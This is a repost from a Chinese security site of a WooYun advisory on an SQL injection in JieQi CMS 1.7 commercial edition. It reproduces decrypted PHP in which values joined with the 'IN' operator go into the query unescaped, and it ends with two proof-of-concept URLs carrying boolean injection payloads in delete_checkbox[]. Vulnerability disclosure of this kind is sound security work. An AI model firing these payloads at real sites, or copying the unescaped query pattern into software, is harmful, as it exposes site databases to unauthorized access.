热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

杰奇CMS 1.7商业版注入漏洞

发布时间:2014-02-24 09:52文章来源:wooyun文章作者:Phale 点击次数:
摘要:漏洞作者: Phale 提交时间: 2013-11-25 17:20 公开时间: 2014-02-23 17:20 漏洞类型: SQL注射漏洞 简要描述: 杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否...

漏洞作者: Phale

提交时间: 2013-11-25 17:20
公开时间: 2014-02-23 17:20

漏洞类型: SQL注射漏洞
简要描述:

杰奇CMS 1.7商业版用了Zend加密,批量解密后,发现程序员用了几个函数,使得这套系统基本没了注入漏洞。在判断ip时,程序员将.过滤再判断是否是为数字,值得借鉴。
详细说明:

 

  1. class criteria extends criteriaelement 
  2.  
  3.  
  4. var $column; //字段 
  5.  
  6. var $operator; //分隔符 
  7.  
  8. var $value; //值 
  9.  
  10. function criteria( $_obfuscate_eZJe9OBy, $_obfuscate_VgKtFeg = "", $_obfuscate_JChWBNMCFOA = "=" ) 
  11.  
  12.  
  13. $this->column = $_obfuscate_eZJe9OBy; 
  14.  
  15. $this->value = $_obfuscate_VgKtFeg; 
  16.  
  17. $this->operator = $_obfuscate_JChWBNMCFOA; 
  18.  
  19.  
  20. function render( ) 
  21.  
  22.  
  23. if ( !empty( $this->column ) ) 
  24.  
  25.  
  26. $_obfuscate_yHkENun4 = $this->column." ".$this->operator; 
  27.  
  28. .................................. 
  29.  
  30. if ( isset( $this->value ) ) 
  31.  
  32. .................................. 
  33.  
  34. //当分隔符为in时没有对值有任何处理。EditPlus搜索含有"IN"的语句发现了注入。 
  35.  
  36. if ( strtoupper( $this->operator ) == "IN" ) 
  37.  
  38.  
  39. $_obfuscate_yHkENun4 ." ".$this->value; 
  40.  
  41. return $_obfuscate_yHkENun4; 
  42.  
  43.  
  44. //引入单引号 
  45.  
  46. $_obfuscate_yHkENun4 ." '".jieqi_dbslashes( trim( $this->value ) )."'"; 
  47.  
  48.  
  49. return $_obfuscate_yHkENun4; 
  50.  
  51. ------------------------------------------------------------------------------------------ 
  52.  
  53. switch ( $_REQUEST[action] ) 
  54.  
  55.  
  56. case "do_edit" : 
  57.  
  58. include_once( $jieqiModules['space']['path']."/class/blogcat.php" ); 
  59.  
  60. $blog_cat_handler = jieqispaceblogcathandler::getinstance( "JieqiSpaceBlogCatHandler" ); 
  61.  
  62. if ( $_REQUEST['delete_checkbox'] ) 
  63.  
  64.  
  65. $tmpstr = "(".implode( ",", $_REQUEST['delete_checkbox'] ).")"; 
  66.  
  67. $criteria = new criteriacompo( new criteria( "`id`", $tmpstr, "in" ) ); //id in () 
  68.  
  69. $criteria->add( new criteria( "`uid`", $uid ) ); 
  70.  
  71. $criteria->add( new criteria( "`type`", $_REQUEST['type'], "=" ) ); 
  72.  
  73. $criteria->add( new criteria( "`default_cat`", 1, "!=" ) ); 
  74.  
  75. $blog_cat_handler->queryobjects( $criteria ); 
  76.  
  77. $v = $blog_cat_handler->getobject( ); 
  78.  
  79. if ( !empty( $v ) ) 
  80.  
  81.  
  82. $num = $v->getvar( "num" ); 
  83.  
  84. $blog_cat_handler->delete( $criteria ); 
  85.  
  86. unset( $criteria ); 
  87.  

漏洞证明:

http://www.yunsec.net/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=1%23

 


http://www.yunsec.net/modules/space/setblogcat.php?action=do_edit&delete_checkbox[]=3))and 1=2%23

 

标签分类:

上一篇:siteserver最新版3.6.4 sql inject 漏洞
下一篇:ecshop 2.7.3 后台过滤不严可获取shell